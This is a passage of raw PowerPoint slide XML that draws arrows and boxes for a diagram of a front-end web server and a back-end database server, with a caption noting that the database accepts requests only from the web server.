                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="464819" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557783" y="92963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557783" y="736091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="73609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917698" y="6666738"/>
              <a:ext cx="392430" cy="451484"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="392429" h="451484">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="392049" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="392429" h="451484">
                  <a:moveTo>
                    <a:pt x="0" y="112775"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="392049" y="112775"/>
                  </a:lnTo>
                </a:path>
                <a:path w="392429" h="451484">
                  <a:moveTo>
                    <a:pt x="0" y="338327"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="392049" y="338327"/>
                  </a:lnTo>
                </a:path>
                <a:path w="392429" h="451484">
                  <a:moveTo>
                    <a:pt x="0" y="225551"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="392049" y="225551"/>
                  </a:lnTo>
                </a:path>
                <a:path w="392429" h="451484">
                  <a:moveTo>
                    <a:pt x="0" y="451103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="392049" y="451103"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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8000" y="6958583"/>
              <a:ext cx="396239" cy="39623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685794" y="5497957"/>
              <a:ext cx="3430904" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3430904" h="142875">
                  <a:moveTo>
                    <a:pt x="3287776" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3287776" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3402177" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302127" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302127" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401974" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3287776" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3430904" h="142875">
                  <a:moveTo>
                    <a:pt x="3287776" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3287776" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3287776" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3430904" h="142875">
                  <a:moveTo>
                    <a:pt x="3401974" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3302127" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302127" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3402177" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3430651" y="71500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401974" y="5715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68667" y="3828288"/>
              <a:ext cx="888492" cy="85648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76560" y="3863340"/>
              <a:ext cx="888492" cy="85801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410204" y="4821300"/>
              <a:ext cx="7682230" cy="2875280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7682230" h="2875279">
                  <a:moveTo>
                    <a:pt x="142875" y="2785237"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137198" y="2757487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121881" y="2734792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99187" y="2719489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85712" y="2716771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="2785237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85598" y="2716758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85712" y="2713863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85598" y="1507109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57023" y="1507109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57137" y="2716746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43548" y="2719489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20866" y="2734792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5588" y="2757487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2785237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5588" y="2813075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20866" y="2835808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43548" y="2851124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71374" y="2856738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99199" y="2851124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121932" y="2835808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137248" y="2813075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="2785237"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="7682230" h="2875279">
                  <a:moveTo>
                    <a:pt x="3955796" y="2754757"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3950195" y="2727007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3934917" y="2704312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3912235" y="2689009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3898646" y="2686266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3898646" y="2683383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3898646" y="1476629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3870071" y="1476629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3870071" y="2686278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3870071" y="2754757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3870071" y="2686278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3856583" y="2689009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3833850" y="2704312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3818534" y="2727007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3812921" y="2754757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3818534" y="2782595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3833850" y="2805328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3856583" y="2820644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3884422" y="2826258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3912235" y="2820644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3934917" y="2805328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3950195" y="2782595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3955796" y="2754757"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="7682230" h="2875279">
                  <a:moveTo>
                    <a:pt x="7681976" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7676375" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7661097" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7638415" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7610602" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7582763" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7560030" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7544714" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7539101" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7544714" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7560030" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7582763" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7596251" y="139992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7596251" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7596352" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7596251" y="1525397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7596251" y="1590040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7596251" y="2735046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7596251" y="2803525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7596251" y="2735046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7560030" y="2753080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7539101" y="2803525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7544714" y="2831363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7560030" y="2854096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7582763" y="2869412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7610602" y="2875026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7638415" y="2869412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7661097" y="2854096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7676375" y="2831363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7681976" y="2803525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7676375" y="2775775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7661097" y="2753080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7638415" y="2737777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7624826" y="2735034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7624826" y="2732151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7624826" y="1590040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7624826" y="1525397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7624826" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7624826" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7638415" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7661097" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7676375" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7681976" y="71501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7077455" y="4968240"/>
              <a:ext cx="414655" cy="192405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="414654" h="192404">
                  <a:moveTo>
                    <a:pt x="0" y="191897"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8959" y="144791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27763" y="102323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55073" y="65650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89553" y="35926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129863" y="14306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174669" y="1945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222630" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271602" y="9582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315698" y="29882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353472" y="59467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383478" y="96905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404270" y="140764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414400" y="189611"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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7491222" y="5071237"/>
              <a:ext cx="2355850" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2355850" h="142875">
                  <a:moveTo>
                    <a:pt x="2326919" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2226945" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2226945" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212721" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212721" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2355596" y="71500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2326919" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2355850" h="142875">
                  <a:moveTo>
                    <a:pt x="2212721" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="57276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212721" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212721" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2355850" h="142875">
                  <a:moveTo>
                    <a:pt x="2226945" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2212721" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212721" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2226945" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2226945" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2355850" h="142875">
                  <a:moveTo>
                    <a:pt x="2212721" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2212721" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2326919" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212721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524250" y="5142738"/>
              <a:ext cx="3554729" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3554729" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3554729" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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583686" y="6886320"/>
              <a:ext cx="3430904" cy="738505"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3430904" h="738504">
                  <a:moveTo>
                    <a:pt x="752094" y="366903"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="746531" y="339432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731405" y="316979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708952" y="301853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681482" y="296291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399034" y="296291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371551" y="301853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349097" y="316979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333971" y="339432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328422" y="366903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328422" y="667639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333971" y="695121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349097" y="717575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371551" y="732701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399034" y="738251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681482" y="738251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708952" y="732701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731405" y="717575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746531" y="695121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752094" y="667639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752094" y="366903"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3430904" h="738504">
                  <a:moveTo>
                    <a:pt x="3430651" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142875" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3430651" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3430651" y="5715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6725539" y="3203193"/>
            <a:ext cx="117538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76200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Front-end </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="45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600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-100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600" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server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2428981" y="6290564"/>
            <a:ext cx="2049145" cy="1244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13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dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>he</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ata</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-114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6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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ac</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45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dirty="0" sz="1600" spc="-55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dirty="0" sz="1600" spc="-9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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="160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dirty="0" sz="1600" spc="-8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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>re</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="160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dirty="0" sz="1600" spc="-6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dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>eca</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-6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dirty="0" sz="160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dirty="0" sz="1600" spc="-8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50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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2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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5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dirty="0" sz="160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dirty="0" sz="1600" spc="-35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dirty="0" sz="1600" spc="-35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dirty="0" sz="1600" spc="-12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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>to  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>come </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>server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121645" y="7784693"/>
            <a:ext cx="168592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362585">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Back-end </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="20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600" spc="45" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Database</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-65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600" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server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217911" y="3238245"/>
            <a:ext cx="168592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362585">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
